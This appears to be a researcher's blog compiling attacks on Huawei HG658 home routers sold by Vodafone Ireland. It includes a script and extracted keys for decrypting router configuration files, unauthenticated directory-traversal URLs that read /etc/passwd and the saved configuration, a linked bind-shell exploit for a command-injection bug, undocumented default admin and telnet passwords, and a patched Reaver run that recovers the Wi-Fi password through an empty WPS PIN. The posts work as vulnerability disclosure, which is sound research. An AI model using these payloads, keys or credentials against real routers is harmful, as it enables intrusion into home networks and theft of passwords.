Decrypting Configuration Files From Other Huawei Home Gateway Routers

I am writing this since there is a lot of  interest from people in decrypting the configuration files for other routers. I will show how the keys from other routers can be found in the firmware and copied into the hg635_configtool.py python program that has already been published. The router here is a Huawei hg658v2. The firmware was posted in the comments section of another blog post. This is not the only method used in Huawei Home Gateway routers but it is the most common.

I will assume that you have the firmware and have extracted the root filesystem.
You need these four files:-

  1. libxmlapi.so
  2. libhttpapi.so
  3. libcfmapi.so
  4. libmsgapi.so

Step One

Load libxmlapi.so into IDA and go to the ATP_GetInfo1 function.

libxmlapi

Step Two

Go to memory address that the function references. In this case it’s 0000CD44.
Extract the string for the hex view into a text editor and remove the white space.

hexview

Step Three

Once the string is tidied up, copy and paste it into decode_keystore.py


#! /usr/bin/env python
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES

GetInfo1="B909AEE8246..."         # <-String goes here
GetInfo2="ECDB9B11526..."
GetInfo3="B5FCB140995..."
GetInfo4="B88D12774CF..."

def main():
    result=""
    for x in range(0, len(GetInfo1),2):
        result += (GetInfo1[x:x+2] + GetInfo2[x:x+2] + GetInfo3[x:x+2] + GetInfo4[x:x+2] )

    raw=unhexlify(result)

    key=raw[-64:-32]
    iv=raw[-32:-16]
    data=raw[:-64]

    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted_data = cipher.decrypt(data)
    decrypted_data = decrypted_data.decode().rstrip('\0')
    print(str(decrypted_data))

if __name__ == "__main__":
    main()

Step Four

Repeat step 1-3 for the three other files:-

ATP_GetInfo2 is in libhttpapi.so
ATP_GetInfo3 is in libcfmapi.so
ATP_GetInfo4 is in libmsgapi.so

Step Five

Run the program. If you did everything correctly,  you should have output

similar to the following…

1=30000
2=20001
4=20
8=1
8=
10040=BDE00F6EE8FC04C8B427B1B6CAF24DAAE9304E3FD24B247BE0
20040=4E14D5457EC485B25A32212398D88371F0CF516635D3543A9139
1=30001
2=20001
4=20
8=1
8=
10040=F4EFB33E928186F3445B5E964160378E5718FC943B3C05F903D4
20040=207C240301C48764738846BAD58074551B513C3F6A0D29143102
1=30002
2=20001
4=10
8=1
8=
10040=B3C353837F0A5B90EDD013087DA2B607
20040=3C46FCF50F4EC875DE0AD8DA9A6D02BF
1=30003
2=80000
4=80
8=1
8=
40010=EAB4FB648F8CB95E4A29EC4A8265EC
80010=010001
40020=EAB4FB648F8CB95E4A29EC4A8265EC57450836763D
80020=010001
100020=C07474EB69963FEDE42C6A3852A296E09C977669102975
200020=FF4D35B54EE70B03F1AFB56294D02AFD80F768D8AECDF7
400020=EB59597DF4619EF5D8EFF3C1EF85509EDFB1B283E034A1F
800020=1DE0F56630C3CD803AAAEBB98BDD090AFE2AF6745590F96
1000020=CE14E83B55C221BAAF62B634ECF2F4FC996E759DEAB6C
2000020=8FD16E722036236821346C7286E9BF386FE49BB581DD4
1=30004
2=20001
4=20
8=1
8=
10040=11BACD4463C8BBBE3DABE52D522E39EF8896C79E76A7BB4D
20040=D10CAD164B3BE61BB4AB0EDCD7E347AF466A7214B866CFC5
1=9F0002
2=C0000
4=20
8=1
8=
4000000=74BAA767607C35DD244AB289ADC88E4B66D929035D343C1A9C
1=1A0000
2=80000
4=80
8=2
40010=B70E12FE035BBB59AFE655BAFE8729562A56FA95DA4F3CF4FC2DB6EE0C1
80010=010001

Step Six

Replace the keys in hg635_configtool.py with these ones:-

Key to Replace Keyset/Keytype Value
RSA_D 30003/100020 C07474…
RSA_N 30003/40010 EAB4FB…
AES256CBC_KEY 30000/10040 BDE00F…
AES256CBC_IV 30000/20040 4E14D5…
Passwords AES Key 30002/10040 B3C353
Passwords AES IV 30002/20040 3C46FC…

Result

Here is the finished file. hg658v2_configtool.py

Advertisements

Directory Traversal Bug

Files in the “/images” web server directory can be downloaded without having to log in.
Also, the web server fails to properly sanitise the URL. By combining both of these facts, downloading arbitrary files from the
router is possible. E.g.

http://192.168.1.1/images/.../...//.../...//etc/passwd
http://192.168.1.1/images/.../...//.../...//config/currentcfg

“/config/currentcfg” contains the current router configuration. Once decrypted, the password hashes in the file
can be used to login. Note, the configuration tool I posted will not decrypt this file as the file format is slightly
different.

A not so interesting Bug

The “B14” firmware had a bug described here on boards.ie  by “Dermot McDonnell”. This was fixed in the “B18” firmware by changing an insecure system() function call with a more secure ATP_UTIL_ExecCmdNoHang() function call. Strangely, the other insecure system() function calls were not fixed at the same time. Here is an exploit using one of the other system() function call bugs. The exploit binds a command shell to TCP port 1234 on the router.

Download link => http://pastebin.com/1h7pci64

Default Vodafone Ireland Passwords

Changing the default password on the router is pointless when:
1) There are undocumented accounts on the router.
2) You don’t have the password needed to log into the account to change the password!

Here is a table of the three usernames and passwords that allow logging into the web interface. The “vodafone” username is the basic account, “superuser” allows full access and “admin” is somewhere between the other two.

Username Password
vodafone vodafone
admin admin1234
superuser HG-658c_VF_ie*

Obtaining the WiFi password in a few seconds using WPS

wifi_setup_screen

The default setting for WPS on the HG658c is “PBC” or “Push Button Configuration”. In this mode of operation, when you attempt to connect to the router’s wireless network, you will be prompted to press a button on the router in order to connect. If the router were only in this mode, it would be reasonable secure.


root@kali:~/reaver/new/src# reaver -i mon0 -c 6 -b 68:A0:F6:01:02:03 -v

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 68:A0:F6:01:02:03
[+] Associated with 68:A0:F6:01:02:03 (ESSID: vodafone-XXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Pin count advanced: 3. Max pin attempts: 11000
[+] Trying pin 11115670.
[+] Pin count advanced: 4. Max pin attempts: 11000
[+] Trying pin 22225672.
[+] Pin count advanced: 5. Max pin attempts: 11000
[+] Trying pin 33335674.
[+] Pin count advanced: 6. Max pin attempts: 11000
[+] 0.05% complete. Elapsed time: 0d0h0m16s.
[+] Trying pin 44445676.
[+] Pin count advanced: 7. Max pin attempts: 11000
[+] Trying pin 55555678.
[+] Pin count advanced: 8. Max pin attempts: 11000
[+] Trying pin 66665670.
[+] Pin count advanced: 9. Max pin attempts: 11000
[+] Trying pin 77775672.
[+] Pin count advanced: 10. Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Session saved.


Running a WPS cracking tool called Reaver against the WiFi network shows that PIN mode is also active. This mode is where you must enter a numerical PIN before you can access the the WiFi network. The router stops responding to Reaver after ten guesses of the PIN. This is due to the HG658c entering a lockout state after ten failed guesses. The router stays locked out until it is restarted. The router also seems to be immune to attempts to force it to restart using Mdk3. This effectively prevents the PIN from being brute-forced.

Connected to 192.168.1.1.
Escape character is '^]'.
-------------------------------
-----Welcome to ATP Cli------
-------------------------------

Login: !!Huawei
Password: 
ATP>sh


BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# nvram show  | grep wps_device_pin  
size: 2659 bytes (30109 left)
wps_device_pin=
#

By logging in to the router, we see that WPS PIN is set to an empty string. This is interesting because Reaver only checks numerical strings. After a quick and dirty modification to the Reaver source code, it is possible to check an empty string PIN.  The patch can be found here. To activate the patch, use the “-B” switch with reaver.


root@kali:~/reaver# git clone https://github.com/t6x/reaver-wps-fork-t6x.git reaver
root@kali:~/reaver# cd reaver
root@kali:~/reaver/reaver# patch -p1 < ../emptystringpin.diff 
root@kali:~/reaver/reaver# cd src/
root@kali:~/reaver/reaver/src# ./configure ; make
root@kali:~/reaver/reaver/src# ./reaver -i mon0 -c 6 -b 68:A0:F6:01:02:03 -v -B


Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 68:A0:F6:01:02:03
[+] Associated with 68:A0:F6:01:02:03 (ESSID: vodafone-XXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] WPS PIN: '12345670'
[+] WPA PSK: 'SuperSecretWifiPassword'
[+] AP SSID: 'vodafone-XXXX'


Oh noes, there is my super secret password! The same bug probably affects other Broadcom chipset based routers as well. I have not tested any others. Obviously, I recommend that you disable WPS to avoid this bug 😉

Enabling Telnet

Telnet can be enabled quite easily by setting “TelnetEnable” to “1” in the
configutation file. This also sets up firewall rules to permit access
to port 23.

“!!Huawei” and “@HuaweiHgw” are the default username and password.

ATP>sh

BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Here is the output from a few commands that I ran.


# cat /proc/cpuinfo
system type        : 63268hg622b
processor        : 0
cpu model        : Broadcom4350 V8.0
BogoMIPS        : 399.36
wait instruction    : yes
microsecond timers    : yes
tlb_entries        : 32
extra interrupt vector    : no
hardware watchpoint    : no
ASEs implemented    :
shadow register sets    : 1
core            : 0
VCED exceptions        : not available
VCEI exceptions        : not available

unaligned exceptions        : 280
processor        : 1
cpu model        : Broadcom4350 V8.0
BogoMIPS        : 402.43
wait instruction    : yes
microsecond timers    : yes
tlb_entries        : 32
extra interrupt vector    : no
hardware watchpoint    : no
ASEs implemented    :
shadow register sets    : 1
core            : 0
VCED exceptions        : not available
VCEI exceptions        : not available

unaligned exceptions        : 280

 

# cat /proc/meminfo 
MemTotal:         123196 kB
MemFree:           70120 kB
Buffers:               0 kB
Cached:            15128 kB
SwapCached:            0 kB
Active:             6756 kB
Inactive:          13012 kB
Active(anon):       4644 kB
Inactive(anon):        0 kB
Active(file):       2112 kB
Inactive(file):    13012 kB
SwapTotal:             0 kB
SwapFree:              0 kB
Dirty:                 0 kB
Writeback:             0 kB
AnonPages:          4672 kB
Mapped:             3516 kB
Slab:              24612 kB
SReclaimable:        492 kB
SUnreclaim:        24120 kB
PageTables:          384 kB
NFS_Unstable:          0 kB
Bounce:                0 kB
WritebackTmp:          0 kB
CommitLimit:       61596 kB
Committed_AS:       7892 kB
VmallocTotal:    1032148 kB
VmallocUsed:        7884 kB
VmallocChunk:    1005596 kB

Running processes…

# ps
  PID  Uid        VSZ Stat Command
    1 0           412 S   init       
    2 0               SW< [kthreadd]
    3 0               SW< [migration/0]
    4 0               SW  [sirq-high/0]
    5 0               SW  [sirq-timer/0]
    6 0               SW  [sirq-net-tx/0]
    7 0               SW  [sirq-net-rx/0]
    8 0               SW  [sirq-block/0]
    9 0               SW  [sirq-tasklet/0]
   10 0               SW  [sirq-sched/0]
   11 0               SW  [sirq-hrtimer/0]
   12 0               SW  [sirq-rcu/0]
   13 0               SW< [migration/1]
   14 0               SW  [sirq-high/1]
   15 0               SW  [sirq-timer/1]
   16 0               SW  [sirq-net-tx/1]
   17 0               SW  [sirq-net-rx/1]
   18 0               SW  [sirq-block/1]
   19 0               SW  [sirq-tasklet/1]
   20 0               SW  [sirq-sched/1]
   21 0               SW  [sirq-hrtimer/1]
   22 0               SW  [sirq-rcu/1]
   23 0               SW< [events/0]
   24 0               SW< [events/1]
   25 0               SW< [khelper]
   28 0               SW< [async/mgr]
   29 0               SW< [board]
   99 0               SW< [kblockd/0]
  100 0               SW< [kblockd/1]
  109 0               SW< [khubd]
  126 0               SW< [bpm]
  142 0               SW  [pdflush]
  143 0               SW  [pdflush]
  144 0               SWN [kswapd0]
  146 0               SW< [crypto/0]
  147 0               SW< [crypto/1]
  219 0               SW< [mtdblockd]
  255 0               SW  [dsl0]
  257 0               SW< [linkwatch]
  265 0           452 S   -/bin/sh
  375 0               SWN [jffs2_gcd_mtd2]
  403 0           408 S   atserver
  413 0               SW  [kpAliveWatchdog]
  432 0               SW  [bcmsw]
  433 0               SW  [bcmsw_timer]
  458 0           920 S   mic
  460 0           320 S   klog
  462 0           560 S   log
  464 0          1928 S   cms
  692 0           376 S   ipcheck
  694 0           680 S   dhcps
  979 0           340 S   /bin/lld2d br0
 1006 0           284 S   /bin/eapd
 1009 0           548 S   /bin/nas
 1013 0           332 S   /bin/acsd
 1024 0           776 S   /bin/wps_monitor
 1055 0           456 S   /bin/radvd -C /var/radvd/radvd.conf br0
 1082 0           312 S   ipp -f /etc/printers.ini
 1084 0           412 S   dns
 1102 0           520 S   pppc -I ppp258
 1527 0           396 S   sntp
 1532 0           328 S   usbmount
 1563 0          2796 S < voiper start
 1565 0          2796 S < voiper start
 1566 0          2796 S < voiper start
 1567 0          2796 S < voiper start
 1568 0          2796 S < voiper start
 1569 0          2796 S < voiper start
 1581 0          2796 S < voiper start
 1586 0          2796 S < voiper start
 1587 0          2796 S < voiper start
 1588 0          2796 S < voiper start
 1589 0          2796 S < voiper start
 1590 0          2796 S < voiper start
 1591 0          2796 S < voiper start
 1592 0          2796 S < voiper start
 1593 0          2796 S < voiper start
 1594 0          2796 S < voiper start
 1595 0          2796 S < voiper start
 1596 0          2796 S < voiper start
 1597 0          2796 S < voiper start
 1598 0          2796 S < voiper start
 1599 0          2796 S < voiper start
 1600 0          2796 S < voiper start
 1601 0          2796 S < voiper start
 1602 0          2796 S < voiper start
 1603 0          2796 S < voiper start
 1607 0          2796 S < voiper start
 1707 0           588 R   telnet_cli -l 1
 1838 0           464 R   sh -si
 1839 0           416 R   ps 
 

Lots of opens ports…

# netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:37443           0.0.0.0:*               LISTEN      
tcp        0      0 192.168.1.1:1990        0.0.0.0:*               LISTEN      
tcp        0      0 127.0.0.1:8011          0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:ftp             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:telnet          0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:631             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:5916            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:37215           0.0.0.0:*               LISTEN      
tcp        0      0 :::www                  :::*                    LISTEN      
tcp        0      0 :::ftp                  :::*                    LISTEN      
tcp        0      0 :::631                  :::*                    LISTEN      
tcp        0      0 :::https                :::*                    LISTEN      
udp        0      0 0.0.0.0:syslog          0.0.0.0:*                           
udp        0      0 0.0.0.0:37000           0.0.0.0:*                           
udp        0      0 127.0.0.1:38032         0.0.0.0:*                           
udp        0      0 0.0.0.0:42000           0.0.0.0:*                           
udp        0      0 127.0.0.1:42032         0.0.0.0:*                           
udp        0      0 127.0.0.1:40500         0.0.0.0:*                           
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           
udp        0      0 127.0.0.1:domain        0.0.0.0:*                           
udp        0      0 0.0.0.0:39995           0.0.0.0:*                           
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           
udp        0      0 127.0.0.1:37064         0.0.0.0:*                           
udp        0      0 0.0.0.0:50000           0.0.0.0:*                           
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           
udp        0      0 0.0.0.0:38000           0.0.0.0:*                           
udp        0      0 :::domain               :::*                                
udp        0      0 ::1:domain              :::*                                
raw        0      0 :::58                   :::*                    7           
raw        0      0 :::58                   :::*                    7           
raw        0      0 :::58                   :::*                    7   

 

Huawei HG658C Firmware Configuration Decryption Tool

If you ever downloaded the configuration file from the hg658c router, you might have noticed that it is encrypted.  Wouldn’t it be great if you were able to decrypt the file, make some changes and then upload it back onto the router? Now you can!

To decrypt a configuration file:
python hg658c_configtool.py decrypt input_file output_file

To encrypt a configuration file:
python hg658c_configtool.py encrypt input_file output_file

Download link =>  http://pastebin.com/8DPdK3V6